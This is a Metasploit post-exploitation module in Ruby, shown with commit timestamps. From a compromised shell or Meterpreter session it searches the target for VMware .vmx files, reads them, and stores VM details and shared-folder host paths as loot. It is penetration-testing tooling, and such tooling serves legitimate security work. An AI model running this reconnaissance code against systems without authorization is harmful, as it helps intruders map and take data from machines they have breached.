metasploit-framework/modules/post/multi/gather/find_vmx.rb

131 lines
3.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'yaml'
class Metasploit3 < Msf::Post
2013-08-30 21:28:54 +00:00
include Msf::Post::File
2013-08-30 21:28:54 +00:00
def initialize(info={})
super( update_info(info,
'Name' => 'Multi Gather VMWare VM Identification',
'Description' => %q{
This module will attempt to find any VMWare virtual machines stored on the target.
},
'License' => MSF_LICENSE,
'Author' => ['theLightCosine'],
'Platform' => %w{ bsd linux osx unix win },
2013-08-30 21:28:54 +00:00
'SessionTypes' => ['shell', 'meterpreter' ]
))
end
2013-08-30 21:28:54 +00:00
def run
if session_has_search_ext
vms = meterp_search
elsif session.platform =~ /unix|linux|bsd|osx/
vms = nix_shell_search
end
report_vms(vms) if vms
end
2013-08-30 21:28:54 +00:00
def report_vms(vms)
output = "VMWare Virtual Machines\n"
output << "--------------------------------\n"
vms.each do |vm|
next if vm.empty?
output << "Name: #{vm['name']}\n"
output << "Virtual CPUs: #{vm['cpus']}\n"
output << "Memory: #{vm['memsize']}\n"
output << "Operating System: #{vm['os']}\n"
output << "Network Type: #{vm['eth_type']}\n"
output << "MAC Address: #{vm['mac']}\n"
output << "Shared Folders:\n"
vm['SharedFolders'].each do |folder|
output << "\tHost Location: #{folder}\n"
end
output << "\n"
end
print_good output
store_loot('vmware_vms', "text/plain", session, output, "vmware_vms.txt", "VMWare Virtual Machines")
end
2013-08-30 21:28:54 +00:00
def nix_shell_search
vms = []
res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')
res.each_line do |filename|
next unless filename.start_with? '/'
begin
parse = session.shell_command("cat #{filename}")
vms << parse_vmx(parse,filename)
rescue
print_error "Could not read #{filename} properly"
end
end
return vms
end
2013-08-30 21:28:54 +00:00
def meterp_search
vms = []
res = session.fs.file.search(nil, "*.vmx", true, -1)
res.each do |vmx|
filename = "#{vmx['path']}\\#{vmx['name']}"
next if filename.end_with? ".vmxf"
begin
config = client.fs.file.new(filename,'r')
parse = config.read
vms << parse_vmx(parse,filename)
rescue
print_error "Could not read #{filename} properly"
end
end
return vms
end
2013-08-30 21:28:54 +00:00
def parse_vmx(vmx_data, filename)
vm= {}
unless vmx_data.nil? or vmx_data.empty?
vm['SharedFolders'] = []
vmx_data.each_line do |line|
data = line.split("=")
vm['path'] = filename
case data[0]
when "memsize "
vm['memsize'] = data[1].gsub!("\"",'').lstrip.chomp
when "displayName "
vm['name'] = data[1].gsub!("\"",'').lstrip.chomp
when "guestOS "
vm['os'] = data[1].gsub!("\"",'').lstrip.chomp
when "ethernet0.connectionType "
vm['eth_type'] = data[1].gsub!("\"",'').lstrip.chomp
when "ethernet0.generatedAddress "
vm['mac'] = data[1].gsub!("\"",'').lstrip.chomp
when "numvcpus "
vm['cpus'] = data[1].gsub!("\"",'').lstrip.chomp
when "sharedFolder0.hostPath "
vm['SharedFolders'] << data[1].gsub!("\"",'').lstrip.chomp
end
end
vm['cpus'] ||= "1"
end
return vm
end
2013-08-30 21:28:54 +00:00
def session_has_search_ext
begin
return !!(session.fs and session.fs.file)
rescue NoMethodError
return false
end
end
end